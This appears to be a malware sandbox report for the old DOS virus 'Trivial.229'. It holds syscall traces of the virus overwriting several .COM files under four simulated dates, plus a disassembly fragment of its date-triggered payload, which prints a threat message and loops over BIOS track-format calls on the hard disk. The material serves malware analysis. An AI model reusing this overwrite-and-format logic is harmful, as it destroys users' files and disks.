Sample viewer

vx.netlux.org/Virus.DOS.Trivial.229


Syscalls:

Time Syscall Op Syscall Name
2018-12-17T23:01:20.018608332Z 78 PC: 12a49 | Find first file
2018-12-17T23:01:20.025478167Z 61 PC: 12a51 | Open file (Filename = 'SLEEP.COM')
2018-12-17T23:01:20.034056278Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.044460213Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.059803726Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.073382373Z 61 PC: 12a51 | Open file (Filename = 'PRINT.COM')
2018-12-17T23:01:20.080947009Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.088502363Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.106755902Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.113265568Z 61 PC: 12a51 | Open file (Filename = 'HELLO.COM')
2018-12-17T23:01:20.121028282Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.129188931Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.138977033Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.14204264Z 61 PC: 12a51 | Open file (Filename = 'PHANG.COM')
2018-12-17T23:01:20.149368923Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.157240821Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.165735193Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.168827283Z 61 PC: 12a51 | Open file (Filename = 'PRINTA~1.COM')
2018-12-17T23:01:20.176632083Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.18469027Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.193225603Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.197512914Z 61 PC: 12a51 | Open file (Filename = 'MANDEL.COM')
2018-12-17T23:01:20.206072005Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.213947108Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.224036222Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.227711824Z 61 PC: 12a51 | Open file (Filename = 'PAH.COM')
2018-12-17T23:01:20.235422866Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.249602622Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.25840632Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.261367109Z 61 PC: 12a51 | Open file (Filename = 'TEST.COM')
2018-12-17T23:01:20.270089916Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-17T23:01:20.278590997Z 62 PC: 12a61 | Close file
2018-12-17T23:01:20.287174331Z 79 PC: 12a65 | Find next file
2018-12-17T23:01:20.289896122Z 42 PC: 12a6b | Get date
0x12a6b: cmp dh, 4
0x12a6e: je 0x12a7e
0x12a70: cmp dh, 5
0x12a73: je 0x12a7e
0x12a75: mov ah, 9
0x12a77: mov dx, 0x1ad
0x12a7a: int 0x21
0x12a7c: int 0x20
0x12a7e: mov ah, 9
0x12a80: mov dx, 0x188
0x12a83: int 0x21
0x12a85: mov dx, 0x80
0x12a88: xor ch, ch
0x12a8a: mov ah, 5
0x12a8c: int 0x13
0x12a8e: cmp dh, 0x20
0x12a91: je 0x12a97
0x12a93: inc dh
0x12a95: jmp 0x12a85
0x12a97: cmp ch, 0x20
2018-12-17T23:01:20.293183143Z 9 PC: 12a7c | Display string (String= 'Program too big to fit in memory.')

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13828,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:12.648069825Z 78 PC: 12a49 | Find first file
2018-12-25T12:39:12.652140105Z 61 PC: 12a51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:12.660153668Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-25T12:39:12.667603271Z 62 PC: 12a61 | Close file
2018-12-25T12:39:12.685391524Z 79 PC: 12a65 | Find next file
2018-12-25T12:39:12.689332156Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.696842366Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.704259073Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.71359344Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.716847626Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.724671771Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.733648664Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.742269258Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.745123351Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.752743346Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.762569193Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.770933354Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.774137465Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.78272847Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.790904264Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.800476485Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.803497248Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.810830179Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.818903794Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.824142144Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.826309171Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.830680752Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.836075058Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.841430077Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.844187803Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.859525821Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.867154301Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.876513984Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.879851289Z 42 PC: 12a6b | Get date
0x12a6b: cmp dh, 4
0x12a6e: je 0x12a7e
0x12a70: cmp dh, 5
0x12a73: je 0x12a7e
0x12a75: mov ah, 9
0x12a77: mov dx, 0x1ad
0x12a7a: int 0x21
0x12a7c: int 0x20
0x12a7e: mov ah, 9
0x12a80: mov dx, 0x188
0x12a83: int 0x21
0x12a85: mov dx, 0x80
0x12a88: xor ch, ch
0x12a8a: mov ah, 5
0x12a8c: int 0x13
0x12a8e: cmp dh, 0x20
0x12a91: je 0x12a97
0x12a93: inc dh
0x12a95: jmp 0x12a85
0x12a97: cmp ch, 0x20
2018-12-25T12:39:12.882199702Z 9 PC: 12a7c | Display string (String= 'Program too big to fit in memory.')

{"DateBased":true,"Day":1,"Month":4,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13828,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:12.715514869Z 78 PC: 12a49 | Find first file
2018-12-25T12:39:12.722716295Z 61 PC: 12a51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:12.730444222Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-25T12:39:12.740296045Z 62 PC: 12a61 | Close file
2018-12-25T12:39:12.755860384Z 79 PC: 12a65 | Find next file
2018-12-25T12:39:12.760780458Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.76905203Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.777232149Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.786750588Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.789592102Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.796821519Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.805794026Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.814393477Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.817241037Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.825571044Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.833276161Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.842097786Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.846032374Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.853479332Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.858989016Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.864812762Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.868279976Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.876674419Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.884374696Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.892966162Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.894812803Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.900372346Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.905960615Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.911432363Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.913397271Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.918347047Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.920279787Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.925913141Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.929639522Z 42 PC: 12a6b | Get date
0x12a6b: cmp dh, 4
0x12a6e: je 0x12a7e
0x12a70: cmp dh, 5
0x12a73: je 0x12a7e
0x12a75: mov ah, 9
0x12a77: mov dx, 0x1ad
0x12a7a: int 0x21
0x12a7c: int 0x20
0x12a7e: mov ah, 9
0x12a80: mov dx, 0x188
0x12a83: int 0x21
0x12a85: mov dx, 0x80
0x12a88: xor ch, ch
0x12a8a: mov ah, 5
0x12a8c: int 0x13
0x12a8e: cmp dh, 0x20
0x12a91: je 0x12a97
0x12a93: inc dh
0x12a95: jmp 0x12a85
0x12a97: cmp ch, 0x20
2018-12-25T12:39:12.931555058Z 9 PC: 12a85 | Display string (String= 'Your hard drive is about to explode!')

{"DateBased":true,"Day":1,"Month":5,"Year":1980,"Hour":0,"Min":0,"Second":0,"TimeBased":false,"OriginalID":13828,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:39:12.740880539Z 78 PC: 12a49 | Find first file
2018-12-25T12:39:12.747087274Z 61 PC: 12a51 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:39:12.753381203Z 64 PC: 12a5d | Write file or device (Write 229 bytes on handle 5)
2018-12-25T12:39:12.75961578Z 62 PC: 12a61 | Close file
2018-12-25T12:39:12.772819823Z 79 PC: 12a65 | Find next file
2018-12-25T12:39:12.775594036Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.782086616Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.788721673Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.79687069Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.799376616Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.813961376Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.82381489Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.83149697Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.833925759Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.841053734Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.847441878Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.855003181Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.859179125Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.865754139Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.872278817Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.881142423Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.885308394Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.898470795Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.905791182Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.913290748Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.915776366Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.923560249Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.930768934Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.938773621Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.94200909Z 61 PC: 12a51 | Open file (See above)
2018-12-25T12:39:12.948788637Z 64 PC: 12a5d | Write file or device (See above)
2018-12-25T12:39:12.951834031Z 62 PC: 12a61 | Close file (See above)
2018-12-25T12:39:12.959953225Z 79 PC: 12a65 | Find next file (See above)
2018-12-25T12:39:12.962726864Z 42 PC: 12a6b | Get date
0x12a6b: cmp dh, 4
0x12a6e: je 0x12a7e
0x12a70: cmp dh, 5
0x12a73: je 0x12a7e
0x12a75: mov ah, 9
0x12a77: mov dx, 0x1ad
0x12a7a: int 0x21
0x12a7c: int 0x20
0x12a7e: mov ah, 9
0x12a80: mov dx, 0x188
0x12a83: int 0x21
0x12a85: mov dx, 0x80
0x12a88: xor ch, ch
0x12a8a: mov ah, 5
0x12a8c: int 0x13
0x12a8e: cmp dh, 0x20
0x12a91: je 0x12a97
0x12a93: inc dh
0x12a95: jmp 0x12a85
0x12a97: cmp ch, 0x20
2018-12-25T12:39:12.964874718Z 9 PC: 12a85 | Display string (String= 'Your hard drive is about to explode!')